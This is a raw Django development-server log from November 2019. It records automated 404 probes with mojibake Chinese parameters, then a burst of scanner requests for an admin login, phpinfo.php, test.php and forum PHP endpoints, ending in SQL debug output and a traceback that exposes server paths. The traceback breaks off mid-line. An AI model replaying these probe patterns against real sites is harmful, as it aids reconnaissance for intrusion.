21:31:18] "GET / HTTP/1.0" 302 0 [29/Nov/2019 21:36:22] "GET / HTTP/1.0" 302 0 [29/Nov/2019 21:41:29] "GET / HTTP/1.0" 302 0 [29/Nov/2019 21:46:35] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Nov/2019 21:49:40] "GET /robots.txt HTTP/1.0" 404 6406 Not Found: /ShowAuthor.asp [29/Nov/2019 21:49:44] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%87%C3%85%C2%B6%C3%95%C2%B8%C3%9F%C2%BC%C2%B6%C3%96%C3%90%C3%91%C2%A7%C2%BD%C3%8C%C3%8E%C3%B1%C2%B4%C2%A6 HTTP/1.0" 404 6557 Not Found: /ShowAuthor.asp [29/Nov/2019 21:49:58] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%87%C3%85%C2%B6%C3%95%C2%B8%C3%9F%C3%96%C3%90%C2%BD%C3%8C%C3%8E%C3%B1%C2%B4%C2%A6 HTTP/1.0" 404 6533 Not Found: /ShowAuthor.asp [29/Nov/2019 21:50:05] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%8E%C3%82%C3%96%C3%9D%C3%8A%C3%90%C2%BD%C3%8C%C3%91%C3%90%C3%8A%C3%92 HTTP/1.0" 404 6521 Not Found: /ShowAuthor.asp [29/Nov/2019 21:50:14] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%8E%C3%82%C3%96%C3%9D%C3%8A%C3%90%C2%BD%C3%8C%C3%93%C3%BD%C2%BE%C3%96 HTTP/1.0" 404 6521 Not Found: /ShowAuthor.asp [29/Nov/2019 21:50:21] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%95%C3%A2%C3%90%C2%A9%C2%BE%C3%9E%C3%88%C3%8B%C2%BE%C2%BF%C2%BE%C2%B9%C3%80%C3%AB%C3%94%C3%9B%C3%83%C3%87%C3%93%C3%90%C2%B5%C3%A3%C2%BC%C3%A4%C2%B8%C3%B4%C3%81%C3%8B HTTP/1.0" 404 6617 Not Found: /ShowAuthor.asp [29/Nov/2019 21:50:31] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E4%BB%8E%E6%A0%B9%E6%9C%AC%E4%B8%8A%E9%9A%94%E7%BB%9D%E8%B4%AB%E7%A9%B7%E7%9A%84%E4%BB%A3%E9%99%85%E4%BC%A0%E9%80%92 HTTP/1.0" 404 6566 Not Found: /ShowAuthor.asp [29/Nov/2019 21:50:36] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E4%BB%A5%E5%AE%9E%E5%8A%9B%E5%8C%B9%E9%85%8D%E4%BA%86%E5%AE%A3%E4%BC%A0%E7%9A%84%E6%83%85%E6%80%80 HTTP/1.0" 404 6548 Not Found: /ShowAuthor.asp [29/Nov/2019 21:50:45] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E5%85%91%E5%A5%96%E5%A4%84%E5%B7%A5%E4%BD%9C%E4%BA%BA%E5%91%98%E7%AC%AC%E4%B8%80%E6%97%B6%E9%97%B4%E5%91%8A%E7%9F%A5 HTTP/1.0" 404 6566 Not Found: /ShowAuthor.asp [29/Nov/2019 21:50:52] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E5%A5%A5%E8%BF%AA%E5%90%8C%E6%AF%94%E5%A2%9E%E5%8A%A05.9%25%E8%87%B36,195%E8%BE%86 HTTP/1.0" 404 6532 Not Found: /ShowAuthor.asp [29/Nov/2019 21:51:00] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E4%B8%AD%E6%95%99%E5%8A%A1%E5%A4%84 HTTP/1.0" 404 6512 Not Found: /ShowAuthor.asp [29/Nov/2019 21:51:13] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E7%BA%A7%E4%B8%AD%E5%AD%A6%E6%95%99%E5%8A%A1%E5%A4%84 HTTP/1.0" 404 6530 Not Found: /ShowAuthor.asp [29/Nov/2019 21:51:28] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E6%B8%A9%E5%B7%9E%E5%B8%82%E6%95%99%E7%A0%94%E5%AE%A4 HTTP/1.0" 404 6503 [29/Nov/2019 21:51:38] "GET / HTTP/1.0" 302 0 Not Found: /ShowAuthor.asp [29/Nov/2019 21:51:39] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E6%B8%A9%E5%B7%9E%E5%B8%82%E6%95%99%E8%82%B2%E5%B1%80 HTTP/1.0" 404 6503 Not Found: /ShowAuthor.asp [29/Nov/2019 21:51:49] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E8%8B%8D%E5%8D%97%E6%95%99%E8%82%B2%E7%BD%91 HTTP/1.0" 404 6494 Not Found: /ShowAuthor.asp [29/Nov/2019 21:51:58] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%E8%BF%99%E4%BA%9B%E5%B7%A8%E4%BA%BA%E7%A9%B6%E7%AB%9F%E7%A6%BB%E5%92%B1%E4%BB%AC%E6%9C%89%E7%82%B9%E9%97%B4%E9%9A%94%E4%BA%86 HTTP/1.0" 404 6575 Not Found: /ShowAuthor.asp [29/Nov/2019 21:52:07] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%C2%B0%C3%AC%C3%80%C3%AD%C3%8D%C3%A6%C2%BC%C3%92%C3%8D%C3%85%C2%B6%C3%93 HTTP/1.0" 404 6521 Not Found: /ShowAuthor.asp [29/Nov/2019 21:52:18] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%C3%87%C3%85%C2%B6%C3%95%C2%B8%C3%9F%C3%96%C3%90%C2%B5%C2%B3%C3%96%C2%A7%C2%B2%C2%BF HTTP/1.0" 404 6533 Not Found: /ShowAuthor.asp [29/Nov/2019 21:52:25] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%C3%8B%C3%BB%C3%8F%C2%B2%C2%B0%C2%AE%C3%95%C3%A2%C2%B8%C3%B6%C3%8D%C3%AA%C2%B1%C3%8F HTTP/1.0" 404 6533 Not Found: /ShowAuthor.asp [29/Nov/2019 21:52:32] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%E4%BB%96%E5%96%9C%E7%88%B1%E8%BF%99%E4%B8%AA%E5%AE%8C%E6%AF%95 HTTP/1.0" 404 6512 Not Found: /ShowAuthor.asp [29/Nov/2019 21:52:41] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%E5%8A%9E%E7%90%86%E7%8E%A9%E5%AE%B6%E5%9B%A2%E9%98%9F HTTP/1.0" 404 6503 Not Found: /ShowAuthor.asp [29/Nov/2019 21:52:57] "GET /ShowAuthor.asp?ChannelID=1004&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E4%B8%AD%E5%85%9A%E6%94%AF%E9%83%A8 HTTP/1.0" 404 6512 Not Found: /ShowAuthor.asp [29/Nov/2019 21:53:09] "GET /ShowAuthor.asp?ChannelID=1005&AuthorName=%C3%90%C2%A1%C2%BA%C2%A2%C3%97%C3%93%C2%BF%C3%89%C3%84%C3%9C%C3%8A%C3%9C%C2%BF%C3%A0 HTTP/1.0" 404 6533 Not Found: /ShowAuthor.asp [29/Nov/2019 21:53:15] "GET /ShowAuthor.asp?ChannelID=1005&AuthorName=%E5%B0%8F%E5%AD%A9%E5%AD%90%E5%8F%AF%E8%83%BD%E5%8F%97%E8%8B%A6 HTTP/1.0" 404 6512 Not Found: /ShowAuthor.asp [29/Nov/2019 21:53:24] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%C2%BD%C3%8C%C3%8E%C3%B1%C2%BF%C3%86%C3%91%C3%90%C2%B4%C2%A6 HTTP/1.0" 404 6509 Not Found: /ShowAuthor.asp [29/Nov/2019 21:53:36] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%C3%87%C3%85%C2%B6%C3%95%C2%B8%C3%9F%C3%96%C3%90%C2%BD%C3%8C%C3%8E%C3%B1%C2%B4%C2%A6 HTTP/1.0" 404 6533 Not Found: /ShowAuthor.asp [29/Nov/2019 21:53:44] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%C3%8E%C2%BB%C2%BE%C3%93%C2%B9%C3%BA%C3%84%C3%9A%C2%B3%C3%8B%C3%93%C3%83%C2%B3%C2%B5%C3%89%C3%8C%C2%B3%C2%A1%C2%B0%C3%B1%C3%8A%C3%97 HTTP/1.0" 404 6581 Not Found: /ShowAuthor.asp [29/Nov/2019 21:53:55] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E4%BD%8D%E5%B1%85%E5%9B%BD%E5%86%85%E4%B9%98%E7%94%A8%E8%BD%A6%E5%95%86%E5%9C%BA%E6%A6%9C%E9%A6%96 HTTP/1.0" 404 6548 Not Found: /ShowAuthor.asp [29/Nov/2019 21:54:06] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E5%93%81%E7%89%8C%E5%8F%97%E5%B0%BE%E6%B0%94%E9%97%A8%E5%BD%B1%E5%93%8D%E8%B7%8C%E8%90%BD25%25 HTTP/1.0" 404 6544 Not Found: /ShowAuthor.asp [29/Nov/2019 21:54:17] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E6%95%99%E5%8A%A1%E7%A7%91%E7%A0%94%E5%A4%84 HTTP/1.0" 404 6494 Not Found: /ShowAuthor.asp [29/Nov/2019 21:54:29] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E4%B8%AD%E6%95%99%E5%8A%A1%E5%A4%84 HTTP/1.0" 404 6512 Not Found: /ShowAuthor.asp [29/Nov/2019 21:54:35] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E6%A1%A5%E5%A2%A9%E9%AB%98%E4%B8%AD%E6%95%99%E5%8A%A1%E7%A7%91%E7%A0%94%E5%A4%84 HTTP/1.0" 404 6530 Not Found: /ShowAuthor.asp [29/Nov/2019 21:54:46] "GET /ShowAuthor.asp?ChannelID=1006&AuthorName=%E6%B8%A9%E5%B7%9E%E5%B8%82%E6%95%99%E8%82%B2%E5%B1%80 HTTP/1.0" 404 6503 Not Found: /ShowAuthor.asp [29/Nov/2019 21:54:58] "GET /ShowAuthor.asp?ChannelID=1007&AuthorName=%C2%B6%C3%B8%C3%95%C3%A2%C3%94%C3%94%C3%85%C3%A0%C3%8E%C3%AF%C2%BC%C2%A4%C3%8B%C3%98%C3%93%C3%96%C2%B1%C2%BB%C2%B3%C3%86%C3%8E%C2%AA%C2%B3%C3%A0%C3%83%C2%B9%C3%8B%C3%98 HTTP/1.0" 404 6617 Not Found: /ShowAuthor.asp [29/Nov/2019 21:55:09] "GET /ShowAuthor.asp?ChannelID=1007&AuthorName=%E8%80%8C%E8%BF%99%E6%A0%BD%E5%9F%B9%E7%89%A9%E6%BF%80%E7%B4%A0%E5%8F%88%E8%A2%AB%E7%A7%B0%E4%B8%BA%E8%B5%A4%E9%9C%89%E7%B4%A0 HTTP/1.0" 404 6575 Not Found: /ShowAuthor.asp [29/Nov/2019 21:55:20] "GET /ShowAuthor.asp?ChannelID=1009&AuthorName=%E7%9C%8B%E5%88%B0%E7%81%8C%E6%9C%A8%E4%B8%9B%E9%87%8C%E7%A5%9E%E5%87%BA%E9%AC%BC%E6%B2%A1%E7%9A%84%E8%BA%AB%E5%BD%B1%E4%BA%86%E5%90%97 HTTP/1.0" 404 6584 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:55:30] "GET /ShowCopyFrom.asp?id=722393872713 HTTP/1.0" 404 6440 [29/Nov/2019 21:55:34] "GET / HTTP/1.0" 302 0 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:55:42] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%C2%B0%C3%BC%C2%BA%C2%AC%C2%B8%C3%B8%C2%B1%C2%BE%C2%BF%C3%86%C3%89%C3%BA%C2%A1%C2%A2%C3%91%C3%90%C3%8C%C3%96%C3%89%C3%BA%C3%89%C3%8F%C2%BF%C3%8E HTTP/1.0" 404 6599 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:55:50] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%C2%BA%C3%9C%C3%93%C3%90%C2%B9%C2%A6%C3%82%C3%8A%C2%B5%C3%84%C2%B0%C3%91%C3%97%C3%B7%C3%92%C2%B5%C2%B8%C3%B8%C3%8D%C3%AA%C2%BD%C3%A1 HTTP/1.0" 404 6587 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:55:57] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%C2%BD%C3%B1%C2%BA%C3%B3%C3%93%C2%B0%C3%8F%C3%AC%C3%81%C3%8B%C3%89%C3%A7%C2%BD%C2%BB%C2%B2%C3%85%C2%B8%C3%89%C3%88%C3%A7%C2%BA%C3%8E%C2%B0%C3%AC HTTP/1.0" 404 6599 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:56:09] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%C3%83%C3%B1%C2%BE%C2%AF%C2%BE%C3%8D%C3%80%C2%B4%C2%B5%C2%BD%C3%81%C3%8B%C3%8B%C3%BB%C2%BC%C3%92 HTTP/1.0" 404 6551 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:56:21] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E4%BB%8A%E5%90%8E%E5%BD%B1%E5%93%8D%E4%BA%86%E7%A4%BE%E4%BA%A4%E6%89%8D%E5%B9%B2%E5%A6%82%E4%BD%95%E5%8A%9E HTTP/1.0" 404 6563 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:56:31] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E5%8C%85%E5%90%AB%E7%BB%99%E6%9C%AC%E7%A7%91%E7%94%9F%E3%80%81%E7%A0%94%E8%AE%A8%E7%94%9F%E4%B8%8A%E8%AF%BE HTTP/1.0" 404 6563 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:56:39] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E5%BE%88%E6%9C%89%E5%8A%9F%E7%8E%87%E7%9A%84%E6%8A%8A%E4%BD%9C%E4%B8%9A%E7%BB%99%E5%AE%8C%E7%BB%93 HTTP/1.0" 404 6554 [29/Nov/2019 21:56:46] "GET / HTTP/1.0" 302 0 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:56:54] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E6%8A%95%E6%A1%A3%E6%AF%94%E4%BB%85%E4%B8%BA18%25 HTTP/1.0" 404 6505 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:57:04] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E6%97%A0%E7%96%91%E8%BF%99%E5%B0%B1%E8%AF%9E%E7%94%9F%E4%BA%86%E6%97%A0%E7%A9%B7%E7%9A%84%E8%A8%80%E8%AF%AD%E8%AE%AD%E7%BB%83%E9%9C%80%E8%A6%81 HTTP/1.0" 404 6599 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:57:15] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%E6%B0%91%E8%AD%A6%E5%B0%B1%E6%9D%A5%E5%88%B0%E4%BA%86%E4%BB%96%E5%AE%B6 HTTP/1.0" 404 6527 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:57:24] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=LiDong%C3%94%C3%9A%C3%89%C3%AE%C3%88%C2%AA%C3%91%C2%A7%C3%94%C2%BA%C2%BD%C3%A1%C3%92%C2%B5%C2%BA%C3%B3 HTTP/1.0" 404 6557 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:57:38] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=LiDong%E5%9C%A8%E6%B7%B1%E6%B3%89%E5%AD%A6%E9%99%A2%E7%BB%93%E4%B8%9A%E5%90%8E HTTP/1.0" 404 6533 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:57:47] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=%C2%B8%C3%83%C2%BD%C3%8C%C3%93%C3%BD%C3%82%C2%A5%C2%B3%C2%B7%C2%B3%C3%BD%C2%B9%C2%A4%C2%B3%C3%8C%C2%BE%C2%AD%C2%B7%C3%91%C3%8E%C2%AA1300%C3%8D%C3%B2%C3%94%C2%AA HTTP/1.0" 404 6615 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:57:54] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=%C2%BD%C2%BB%C2%B4%C3%B3%C2%B0%C3%A6%C2%B6%C2%A8%C3%96%C3%86%C3%94%C3%82%C2%B1%C3%BD%C2%B7%C3%96%C3%8E%C2%AA%C3%87%C3%A5%C3%95%C3%A6%C2%BA%C3%8D%C2%B7%C3%87%C3%87%C3%A5%C3%95%C3%A6%C3%81%C2%BD%C3%96%C3%96 HTTP/1.0" 404 6659 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:58:04] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=%E4%BA%A4%E5%A4%A7%E7%89%88%E5%AE%9A%E5%88%B6%E6%9C%88%E9%A5%BC%E5%88%86%E4%B8%BA%E6%B8%85%E7%9C%9F%E5%92%8C%E9%9D%9E%E6%B8%85%E7%9C%9F%E4%B8%A4%E7%A7%8D HTTP/1.0" 404 6608 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:58:13] "GET /ShowCopyFrom.asp?ChannelID=1004&SourceName=%E8%AF%A5%E6%95%99%E8%82%B2%E6%A5%BC%E6%92%A4%E9%99%A4%E5%B7%A5%E7%A8%8B%E7%BB%8F%E8%B4%B9%E4%B8%BA1300%E4%B8%87%E5%85%83 HTTP/1.0" 404 6576 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:58:22] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%C2%B5%C2%AB%C3%87%C3%B2%C2%B6%C3%93%C2%B1%C2%BE%C3%88%C3%BC%C2%BC%C2%BE%C2%B1%C2%BB%C3%8B%C3%95%C3%84%C3%BE%C3%8A%C3%95%C2%B9%C2%BA%C2%BA%C3%B3 HTTP/1.0" 404 6599 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:58:38] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%C2%BF%C3%89%C3%8A%C3%87%C3%8D%C3%B8%C3%82%C3%A7%C3%93%C2%B0%C3%86%C2%AC%C2%B4%C2%A6%C3%93%C3%9A%C2%B8%C3%95%C3%86%C3%B0%C2%B2%C2%BD%C2%B5%C3%84%C3%86%C3%9A%C2%BC%C3%A4 HTTP/1.0" 404 6623 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:58:42] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%C3%84%C2%BF%C3%87%C2%B0%C2%BB%C2%B9%C3%93%C3%90%C3%92%C2%BB%C3%8D%C3%B2%C3%86%C3%9F%C2%B5%C3%84%C2%B4%C3%BB%C2%BF%C3%AE HTTP/1.0" 404 6575 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:58:53] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%C3%8F%C2%A3%C3%8D%C3%BB%C2%B4%C3%B3%C2%BC%C3%92%C2%B6%C2%BC%C3%84%C3%9C%C2%B9%C2%BB%C3%8C%C3%A1%C3%87%C2%B0%C3%97%C3%B6%C2%B5%C2%BD%C3%90%C3%84%C3%80%C3%AF%C3%93%C3%90%C3%8A%C3%BD HTTP/1.0" 404 6635 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:58:57] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E4%BD%86%E7%90%83%E9%98%9F%E6%9C%AC%E8%B5%9B%E5%AD%A3%E8%A2%AB%E8%8B%8F%E5%AE%81%E6%94%B6%E8%B4%AD%E5%90%8E HTTP/1.0" 404 6563 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:59:04] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E5%8F%AA%E9%9C%80%E5%AD%A6%E7%94%9F%E6%9D%A5%E5%92%A8%E8%AF%A2%E5%B0%B1%E8%B5%A0%E9%80%81 HTTP/1.0" 404 6545 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:59:10] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E5%8F%AF%E6%98%AF%E7%BD%91%E7%BB%9C%E5%BD%B1%E7%89%87%E5%A4%84%E4%BA%8E%E5%88%9A%E8%B5%B7%E6%AD%A5%E7%9A%84%E6%9C%9F%E9%97%B4 HTTP/1.0" 404 6581 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:59:24] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E5%B8%8C%E6%9C%9B%E5%A4%A7%E5%AE%B6%E9%83%BD%E8%83%BD%E5%A4%9F%E6%8F%90%E5%89%8D%E5%81%9A%E5%88%B0%E5%BF%83%E9%87%8C%E6%9C%89%E6%95%B0 HTTP/1.0" 404 6590 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:59:31] "GET /ShowCopyFrom.asp?ChannelID=1006&SourceName=%E7%9B%AE%E5%89%8D%E8%BF%98%E6%9C%89%E4%B8%80%E4%B8%87%E4%B8%83%E7%9A%84%E8%B4%B7%E6%AC%BE HTTP/1.0" 404 6545 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:59:46] "GET /ShowCopyFrom.asp?%C3%94%C3%9B%C3%83%C3%87%C3%92%C2%AA%C3%96%C2%AA%C2%B5%C3%80%C2%B0%C2%AE%C3%87%C3%A9%C3%80%C3%AF%C3%83%C2%BB%C3%93%C3%90%C3%85%C3%A4%C2%B2%C2%BB%C3%85%C3%A4 HTTP/1.0" 404 6581 Not Found: /ShowCopyFrom.asp [29/Nov/2019 21:59:55] "GET /ShowCopyFrom.asp?%E5%92%B1%E4%BB%AC%E8%A6%81%E7%9F%A5%E9%81%93%E7%88%B1%E6%83%85%E9%87%8C%E6%B2%A1%E6%9C%89%E9%85%8D%E4%B8%8D%E9%85%8D HTTP/1.0" 404 6542 Not Found: /ShowCopyFrom.asp [29/Nov/2019 22:00:09] "GET /ShowCopyFrom.asp?ChannelID=1007&SourceName=%C2%B5%C2%AB12%C3%84%C3%AA%C3%87%C2%B0%C2%B5%C3%84%C2%BB%C2%B7%C2%BE%C2%B3%C3%8F%C3%96%C3%92%C3%91%C3%8E%C3%9E%C2%B7%C2%A8%C2%B8%C3%84%C2%B6%C2%AF HTTP/1.0" 404 6601 Not Found: /ShowCopyFrom.asp [29/Nov/2019 22:00:16] "GET /ShowCopyFrom.asp?ChannelID=1007&SourceName=%E4%BD%8612%E5%B9%B4%E5%89%8D%E7%9A%84%E7%8E%AF%E5%A2%83%E7%8E%B0%E5%B7%B2%E6%97%A0%E6%B3%95%E6%94%B9%E5%8A%A8 HTTP/1.0" 404 6565 Not Found: /dtgh/ShowClass.asp [29/Nov/2019 22:00:27] "GET /dtgh/ShowClass.asp?ClassID=9&page=%C2%BC%C3%92%C2%B3%C2%A4%C3%90%C3%BB%C2%B3%C3%86%C2%B3%C3%B6%C3%93%C3%9A%C2%BA%C3%83%C3%92%C3%A2 HTTP/1.0" 404 6546 Not Found: /dtgh/ShowClass.asp [29/Nov/2019 22:00:36] "GET /dtgh/ShowClass.asp?ClassID=9&page=%E5%AE%B6%E9%95%BF%E5%AE%A3%E7%A7%B0%E5%87%BA%E4%BA%8E%E5%A5%BD%E6%84%8F HTTP/1.0" 404 6522 Not Found: /Adminb5512046/Login.php [29/Nov/2019 22:00:45] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6445 [29/Nov/2019 22:00:45] "GET / HTTP/1.0" 302 0 Not Found: /l.php [29/Nov/2019 22:00:46] "GET /l.php HTTP/1.0" 404 6390 Not Found: /phpinfo.php [29/Nov/2019 22:00:46] "GET /phpinfo.php HTTP/1.0" 404 6408 Not Found: /test.php [29/Nov/2019 22:00:47] "GET /test.php HTTP/1.0" 404 6399 Not Found: /index.php [29/Nov/2019 22:00:47] "POST /index.php HTTP/1.0" 404 6403 Not Found: /dtgh/ShowClass.asp [29/Nov/2019 22:00:48] "GET /dtgh/ShowClass.asp?ClassID=9&page=%E6%98%AF%E4%B8%80%E9%97%A8%E4%BF%AD%E6%9C%B4%E8%80%8C%E5%B9%BF%E5%8D%9A%E7%9A%84%E5%93%B2%E5%AD%A6 HTTP/1.0" 404 6549 Not Found: /bbs.php [29/Nov/2019 22:00:49] "POST /bbs.php HTTP/1.0" 404 6397 Not Found: /forum.php [29/Nov/2019 22:00:51] "POST /forum.php HTTP/1.0" 404 6403 Not Found: /forums.php [29/Nov/2019 22:00:53] "POST /forums.php HTTP/1.0" 404 6406 Not Found: /bbs/index.php [29/Nov/2019 22:00:55] "POST /bbs/index.php HTTP/1.0" 404 6415 Not Found: /forum/index.php [29/Nov/2019 22:00:55] "POST /forum/index.php HTTP/1.0" 404 6421 Not Found: /forums/index.php [29/Nov/2019 22:00:56] "POST /forums/index.php HTTP/1.0" 404 6424 DEBUG 2019-11-29 22:00:57,466 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) DEBUG 2019-11-29 22:00:57,506 utils 26999 140702522537728 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 22:00:57,507 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:00:57,509 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:00:57,510 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) DEBUG 2019-11-29 22:00:57,512 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 22:00:57,514 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) DEBUG 2019-11-29 22:00:57,515 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) DEBUG 2019-11-29 22:00:57,517 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav' LIMIT 21; args=('webdav',) Internal Server Error: /webdav/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File 